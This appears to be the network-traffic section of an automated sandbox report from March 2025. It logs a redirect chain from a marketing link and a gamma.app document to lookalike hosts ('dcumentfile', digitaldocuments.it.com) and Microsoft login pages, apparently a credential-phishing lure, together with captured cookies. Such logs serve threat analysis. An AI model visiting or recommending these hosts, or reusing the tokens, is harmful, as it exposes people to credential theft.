    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d; intercom-id-ihnzqaok=d9f0b187-e815-4dc9-91b0-3ad995e61b06; intercom-session-ihnzqaok=; intercom-device-id-ihnzqaok=6f2187ea-1625-44e5-9ef3-687e5e997251Sec-WebSocket-Key: ZtCvVwJyLhhBcuTNcsyprg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: graphql-ws
    Source: global trafficHTTP traffic detected: GET /v1/t HTTP/1.1Host: events.api.gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d; intercom-id-ihnzqaok=d9f0b187-e815-4dc9-91b0-3ad995e61b06; intercom-session-ihnzqaok=; intercom-device-id-ihnzqaok=6f2187ea-1625-44e5-9ef3-687e5e997251
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dcumentfile.us-southeast-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d; intercom-id-ihnzqaok=d9f0b187-e815-4dc9-91b0-3ad995e61b06; intercom-session-ihnzqaok=; intercom-device-id-ihnzqaok=6f2187ea-1625-44e5-9ef3-687e5e997251Sec-WebSocket-Key: vl0XPTXzHGQRDUdmZg0k9w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: graphql-ws
    Source: global trafficHTTP traffic detected: GET /messenger/web/metrics HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: public-usa.mkt.dynamics.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: gamma.app
    Source: global trafficDNS traffic detected: DNS query: use.typekit.net
    Source: global trafficDNS traffic detected: DNS query: cdn.iframe.ly
    Source: global trafficDNS traffic detected: DNS query: p.typekit.net
    Source: global trafficDNS traffic detected: DNS query: o698378.ingest.sentry.io
    Source: global trafficDNS traffic detected: DNS query: cdn.optimizely.com
    Source: global trafficDNS traffic detected: DNS query: events.api.gamma.app
    Source: global trafficDNS traffic detected: DNS query: assets.churnkey.co
    Source: global trafficDNS traffic detected: DNS query: app.launchdarkly.com
    Source: global trafficDNS traffic detected: DNS query: cdn.gamma.app
    Source: global trafficDNS traffic detected: DNS query: api.gamma.app
    Source: global trafficDNS traffic detected: DNS query: a187838077.cdn.optimizely.com
    Source: global trafficDNS traffic detected: DNS query: clientstream.launchdarkly.com
    Source: global trafficDNS traffic detected: DNS query: static.cloudflareinsights.com
    Source: global trafficDNS traffic detected: DNS query: logx.optimizely.com
    Source: global trafficDNS traffic detected: DNS query: events.launchdarkly.com
    Source: global trafficDNS traffic detected: DNS query: widget.intercom.io
    Source: global trafficDNS traffic detected: DNS query: canny.io
    Source: global trafficDNS traffic detected: DNS query: imgproxy.gamma.app
    Source: global trafficDNS traffic detected: DNS query: js.intercomcdn.com
    Source: global trafficDNS traffic detected: DNS query: dcumentfile.us-southeast-1.linodeobjects.com
    Source: global trafficDNS traffic detected: DNS query: api-iam.intercom.io
    Source: global trafficDNS traffic detected: DNS query: nexus-websocket-a.intercom.io
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: gytqwxqrwvsvqlclcdpq.digitaldocuments.it.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
    Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
    Source: global trafficDNS traffic detected: DNS query: 7601613767-1317754460.cos.ap-bangkok.myqcloud.com
    Source: global trafficDNS traffic detected: DNS query: office.com
    Source: global trafficDNS traffic detected: DNS query: www.office.com
    Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: wordl.digitaldocuments.it.com
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
    Source: unknownHTTP traffic detected: POST /api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/cp/FMPIXkRqqkmv-j_Li7QBADzIXkbYlRhOtaq-qsAgDFg HTTP/1.1Host: public-usa.mkt.dynamics.comConnection: keep-aliveContent-Length: 261sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/jsonsec-ch-ua-mobile: ?0Accept: */*Origin: https://public-usa.mkt.dynamics.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fgamma.app%252Fdocs%252FJanel-Group-Completed-Document-x686r1ir4nghubz%253Fmode%253Dpresent%2523card-an1daph37h4un5p%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=O1MpDB0efooTe4PN%2BrbvabY6GTxgYZEijI2csju%2FBYg%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 18 Mar 2025 12:10:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeStrict-Transport-Security: max-age=2592000; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Mar 2025 12:10:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8345Connection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="9224a0285ca87289"x-content-options: nosniffx-frame-options: SAMEORIGIN
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 18 Mar 2025 12:10:16 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Mar 2025 12:10:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 7854Connection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="9224a065a9d543a5"x-content-options: nosniffx-frame-options: SAMEORIGIN
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 18 Mar 2025 12:10:33 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 18 Mar 2025 12:10:35 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 12:10:36 GMTContent-Type: application/json; charset=utf-8Content-Length: 78Connection: closeX-Powered-By: ExpressVary: OriginAccess-Control-Allow-Credentials: trueETag: W/"4e-zsIbJVw6xrpzOUC/ZlEdZPzWsAE"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 18 Mar 2025 12:10:36 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 12:10:36 GMTContent-Type: application/json; charset=utf-8Content-Length: 67Connection: closeX-Powered-By: ExpressVary: OriginAccess-Control-Allow-Credentials: trueETag: W/"43-VS8Zk4sa6WhQp4atvaFlfxregaw"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 12:10:37 GMTContent-Type: application/json; charset=utf-8Content-Length: 67Connection: closeX-Powered-By: ExpressVary: OriginAccess-Control-Allow-Credentials: trueETag: W/"43-tRn5gtlf1DvZQJH7tcLHAe4uZTY"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 18 Mar 2025 12:10:38 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Mar 2025 12:10:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8139Connection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="9224a0c69d0480d3"x-content-options: nosniffx-frame-options: SAMEORIGIN
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 18 Mar 2025 12:10:39 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 18 Mar 2025 12:10:39 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 18 Mar 2025 12:10:40 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 12:10:43 GMTContent-Type: application/xmlContent-Length: 228Connection: closex-amz-request-id: tx000008f64df3f116823d6-0067d962c3-132680d11-defaultAccept-Ranges: bytes
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 12:10:48 GMTContent-Type: text/plain; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *access-control-expose-headers: *timing-allow-origin: *Cache-Control: public, max-age=600, s-maxage=600cross-origin-resource-policy: cross-originx-content-type-options: nosniffstrict-transport-security: max-age=31536000; includeSubDomains; preloadetag: W/"35-Su9w8wyWNKnBnB1glhnyKiBNAH4"Age: 163x-served-by: cache-fra-etou8220171-FRA, cache-lga21940-LGAx-cache: HIT, HITvary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hanENjgYT39DxVCKn8ti8oBkevRR%2BTNs9cWEDL47BVXtd%2FXA4srns2Dhoy8Ulw%2Bo62nP4oZ%2BBd8%2Bh%2FhrIM5xALTut2e%2BqqfFdmmF%2BNx1D1ZRs2LjP%2FWRjy1cNfn8GbaqCi4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9224a1028872c470-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 12:10:54 GMTContent-Type: application/json; charset=utf-8Content-Length: 67Connection: closeX-Powered-By: ExpressVary: OriginAccess-Control-Allow-Credentials: trueETag: W/"43-tRn5gtlf1DvZQJH7tcLHAe4uZTY"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 12:10:55 GMTContent-Type: application/json; charset=utf-8Content-Length: 67Connection: closeX-Powered-By: ExpressVary: OriginAccess-Control-Allow-Credentials: trueETag: W/"43-tRn5gtlf1DvZQJH7tcLHAe4uZTY"
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
